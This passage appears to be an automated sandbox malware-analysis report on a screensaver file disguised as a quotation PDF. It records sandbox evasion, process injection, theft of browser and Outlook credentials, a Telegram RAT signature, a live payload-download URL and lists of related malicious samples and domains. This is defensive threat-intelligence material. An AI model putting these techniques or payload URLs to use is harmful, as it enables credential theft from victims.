Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 596094	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 595946	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 595842	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 595624	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 595516	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 595391	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 595266	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 595157	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 595032	Jump to behavior

Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2570021211.0000000003081000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware\|VIRTUAL\|A M I\|Xen
Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2570021211.0000000003081000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft\|VMWare\|Virtual
Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2569130721.000000000122F000.00000004.00000020.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3285672822.00000000014FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr

Memory written: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr

Process created: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr "C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr"

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Queries volume information: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Queries volume information: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Telegram RAT

Source: Yara match	File source: 00000004.00000002.3287257268.0000000003171000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: QUOTATION_JANQUOTE312025#U00faPDF.scr PID: 1988, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Yara match	File source: 00000004.00000002.3287257268.00000000032E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: QUOTATION_JANQUOTE312025#U00faPDF.scr PID: 1988, type: MEMORYSTR

Remote Access Functionality

Yara detected Telegram RAT

Source: Yara match	File source: 00000004.00000002.3287257268.0000000003171000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: QUOTATION_JANQUOTE312025#U00faPDF.scr PID: 1988, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Disable or Modify Tools	1 OS Credential Dumping	1 Query Registry	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	31 Virtualization/Sandbox Evasion	LSASS Memory	11 Security Software Discovery	Remote Desktop Protocol	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	111 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	1 Data from Local System	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	31 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Software Packing	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	13 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
QUOTATION_JANQUOTE312025#U00faPDF.scr	34%	Virustotal		Browse
QUOTATION_JANQUOTE312025#U00faPDF.scr	14%	ReversingLabs	Win32.Trojan.Sonbokli
QUOTATION_JANQUOTE312025#U00faPDF.scr	100%	Avira	HEUR/AGEN.1308518

Source	Detection	Scanner	Label
https://3007.filemail.com/api/file/get?filekey=nN9I6mMR5qmTacpgxgPZpOTdYp-SW4HTmVvL2C95n_miGOwF3I4yRbLhJy2w&pk_vid=8e2aec8f065dac991739460400c1eb95	0%	Avira URL Cloud	safe
https://3007.filemail.com/api/file/get?filekey=nN9I6mMR5qmTacpgxgPZpOTdYp-SW4HTmVvL2C95n_miGOwF3I4yR	0%	Avira URL Cloud	safe
https://3007.filemail.com	0%	Avira URL Cloud	safe
http://3007.filemail.com/api/file/get?filekey=nN9I6mMR5qmTacpgxgPZpOTdYp-SW4HTmVvL2C95n_miGOwF3I4yRb	0%	Avira URL Cloud	safe
http://3007.filemail.com	0%	Avira URL Cloud	safe
http://3007.filemail.com/api/file/get?filekey=nN9I6mMR5qmTacpgxgPZpOTdYp-SW4HTmVvL2C95n_miGOwF3I4yRbLhJy2w&pk_vid=8e2aec8f065dac991739460400c1eb95	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
ip.3007.filemail.com	193.30.119.107	true	false	unknown
reallyfreegeoip.org	104.21.112.1	true	false	high
checkip.dyndns.com	193.122.6.168	true	false	high
3007.filemail.com	unknown	unknown	true	unknown
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://3007.filemail.com/api/file/get?filekey=nN9I6mMR5qmTacpgxgPZpOTdYp-SW4HTmVvL2C95n_miGOwF3I4yRbLhJy2w&pk_vid=8e2aec8f065dac991739460400c1eb95	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.189	false		high
http://checkip.dyndns.org/	false		high
http://3007.filemail.com/api/file/get?filekey=nN9I6mMR5qmTacpgxgPZpOTdYp-SW4HTmVvL2C95n_miGOwF3I4yRbLhJy2w&pk_vid=8e2aec8f065dac991739460400c1eb95	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://stackoverflow.com/q/14436606/23354	QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2588070526.0000000006F50000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2570021211.0000000003081000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-netJ	QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2581469849.0000000004116000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2588070526.0000000006F50000.00000004.08000000.00040000.00000000.sdmp	false		high
https://api.telegram.org/bot	QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.0000000003171000.00000004.00000800.00020000.00000000.sdmp	false		high
https://3007.filemail.com	QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2570021211.0000000003081000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://3007.filemail.com/api/file/get?filekey=nN9I6mMR5qmTacpgxgPZpOTdYp-SW4HTmVvL2C95n_miGOwF3I4yR	QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2570021211.0000000003081000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://reallyfreegeoip.orgd	QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.000000000321D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-net	QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2588070526.0000000006F50000.00000004.08000000.00040000.00000000.sdmp	false		high
http://checkip.dyndns.org	QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.00000000031EE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.00000000031FD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-neti	QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2588070526.0000000006F50000.00000004.08000000.00040000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.189l	QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.00000000031FD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.comd	QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.00000000031FD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/11564914/23354;	QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2588070526.0000000006F50000.00000004.08000000.00040000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2588070526.0000000006F50000.00000004.08000000.00040000.00000000.sdmp	false		high
http://3007.filemail.com/api/file/get?filekey=nN9I6mMR5qmTacpgxgPZpOTdYp-SW4HTmVvL2C95n_miGOwF3I4yRb	QUOTATION_JANQUOTE312025#U00faPDF.scr	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.189d	QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.00000000031FD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://reallyfreegeoip.org	QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.000000000321D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.orgd	QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.00000000031FD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.00000000031FD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.com	QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.00000000031FD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/d	QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.00000000031FD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2570021211.0000000003081000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.0000000003171000.00000004.00000800.00020000.00000000.sdmp	false		high
http://3007.filemail.com	QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2570021211.0000000003081000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/	QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.00000000031FD000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.112.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
193.30.119.107	ip.3007.filemail.com	unknown	680	DFNVereinzurFoerderungeinesDeutschenForschungsnetzese	false
193.122.6.168	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1614909
Start date and time:	2025-02-14 09:19:47 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Potential for more IOCs and behavior
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	QUOTATION_JANQUOTE312025#U00faPDF.scr renamed because original name is a hash value
Original Sample Name:	QUOTATION_JANQUOTE312025PDF.scr
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winSCR@3/0@3/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 71% Number of executed functions: 117 Number of non-executed functions: 20
Cookbook Comments:	Found application associated with file extension: .scr

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target QUOTATION_JANQUOTE312025#U00faPDF.scr, PID 1988 because it is empty
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
03:20:37	API Interceptor	29945x Sleep call for process: QUOTATION_JANQUOTE312025#U00faPDF.scr modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.112.1	AGODA COMPANY PTE LTD.exe	Get hash	malicious	FormBook	Browse	www.tumbetgirislinki.fit/ftbq/?FZQ=issILDDGsHFYNfmqjTyaiRCxUP7MBLRR+fLjt4U/PjAATIgmLn5xJ6OEKWMTVCkC8eR6wGGZNe6kNExjC2H5xoO/guvwFBH7lbkJQqoMGH7yD90zbw==&_j=6nA47ZHp
	http://absoluteprintinequipment.com	Get hash	malicious	HTMLPhisher	Browse	absoluteprintinequipment.com/
	06OJsSI8WG.exe	Get hash	malicious	FormBook	Browse	www.newanthoperso.shop/b4b3/
	Solicitud de cotizacion.exe	Get hash	malicious	FormBook	Browse	www.sigaque.today/n61y/
	NOAH CRYPT.exe	Get hash	malicious	FormBook	Browse	www.clouser.store/0izs/
	X4pCdhjJCI.exe	Get hash	malicious	FormBook	Browse	www.buyspeechst.shop/ub3i/
	k2ax9F6u0c.exe	Get hash	malicious	FormBook	Browse	www.enoughmoney.online/nf1d/
	scan_07022025_pdf.exe	Get hash	malicious	DarkTortilla, Lokibot	Browse	touxzw.ir/jay/five/fre.php
	QUOTE#230188.exe	Get hash	malicious	FormBook	Browse	www.tradingreviewer.net/xy66/
	http://h7h.wartabuvar.org	Get hash	malicious	HTMLPhisher	Browse	h7h.wartabuvar.org/page/images/verify_sms.png
193.122.6.168	Purchase Order No.1364.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Opsprtning.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	(_TOSAM) 13 _UBAT 2025 HAFTALIK EKONOM_ BLTEN_.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	SecuriteInfo.com.FileRepMalware.20861.8466.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	Fizet#U00e9si_szelv#U00e9ny,png.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Win32.MalwareX-gen.10190.17746.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Ziraat Bankasi Swift Mesaji.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	RFQ_pdf.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	ORDER_NO.9077364653BBG.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Tilintetgrelsen.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	kduYCOzG3unrjuS.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	Purchase Order No.1364.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	SHIP PARTICULARS.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	4a. RFx-4045.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	Poundbreach178.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	Opsprtning.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	RFQ-Ref-QE-69774-LD,PDF.vbs	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	132.226.247.73
	DHL AWB Document_pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	MAERSK Shipping Document - Bill of Lading - SWB Receipt - Packing List_PDF.js	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	MAERSK Shipping Document - Bill of Lading - Packing List - SWB Receipt _PDF.js	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
reallyfreegeoip.org	kduYCOzG3unrjuS.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.32.1
	Purchase Order No.1364.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.16.1
	SHIP PARTICULARS.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.48.1
	4a. RFx-4045.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.112.1
	Poundbreach178.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.32.1
	Opsprtning.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.48.1
	RFQ-Ref-QE-69774-LD,PDF.vbs	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	104.21.80.1
	DHL AWB Document_pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.112.1
	MAERSK Shipping Document - Bill of Lading - Packing List - SWB Receipt _PDF.js	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	Limitarian.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.112.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORACLE-BMC-31898US	Purchase Order No.1364.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	SHIP PARTICULARS.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	Poundbreach178.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	Opsprtning.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	DHL AWB Document_pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	Limitarian.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.130.0
	Gruss.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	(_TOSAM) 13 _UBAT 2025 HAFTALIK EKONOM_ BLTEN_.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	Gruss.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	fact.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese	Orden de compra_ 212133545.pdf______________________.vbs	Get hash	malicious	AgentTesla	Browse	193.30.119.105
	MAERSK Shipping Document - Bill of Lading - SWB Receipt - Packing List_PDF.js	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.30.119.105
	MAERSK Shipping Document - Bill of Lading - Packing List - SWB Receipt _PDF.js	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.30.119.105
	res.arm.elf	Get hash	malicious	Unknown	Browse	132.252.127.31
	res.x86.elf	Get hash	malicious	Unknown	Browse	141.93.222.140
	res.mips.elf	Get hash	malicious	Unknown	Browse	141.23.198.245
	Fantazy.ppc.elf	Get hash	malicious	Mirai	Browse	141.61.212.217
	https://conflictescalationstrategy.provokingconflict.cfd/help?32161731835980&extra_param_1=cul3opt3kl6c73b9fjq0	Get hash	malicious	Unknown	Browse	141.95.100.236
	https://www.theintentionaliep.com/product/digital-special-education/	Get hash	malicious	Unknown	Browse	141.95.98.65
	res.arm.elf	Get hash	malicious	Unknown	Browse	141.60.78.84
CLOUDFLARENETUS	kduYCOzG3unrjuS.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.32.1
	https://xoawevk9553z3y2hgkav.lumpnk.ru/vXsP8/	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://wix-filters.autopolis.lt/modules/banner/banner.php?page_id=34&banner_id=386&url=https://tiny-raincoat-big.on-fleek.app/nova.html#Info@ips-intelligence.com	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Purchase Order No.1364.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	payload.ps1	Get hash	malicious	Kdot Stealer	Browse	104.16.124.96
	SHIP PARTICULARS.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.48.1
	4a. RFx-4045.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.112.1
	http://colruyt.us	Get hash	malicious	Unknown	Browse	172.66.0.227
	payload.ps1	Get hash	malicious	Kdot Stealer	Browse	104.16.124.96
	Poundbreach178.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.32.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	kduYCOzG3unrjuS.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	SHIP PARTICULARS.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	4a. RFx-4045.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.112.1
	Poundbreach178.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.112.1
	Opsprtning.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.112.1
	RFQ-Ref-QE-69774-LD,PDF.vbs	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	104.21.112.1
	DHL AWB Document_pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.112.1
	MAERSK Shipping Document - Bill of Lading - Packing List - SWB Receipt _PDF.js	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	Limitarian.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.112.1
	Gruss.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.112.1
3b5074b1b5d032e5620f69f9f700ff0e	kduYCOzG3unrjuS.exe	Get hash	malicious	Snake Keylogger	Browse	193.30.119.107
	payload.ps1	Get hash	malicious	Kdot Stealer	Browse	193.30.119.107
	SHIP PARTICULARS.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	193.30.119.107
	4a. RFx-4045.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.30.119.107
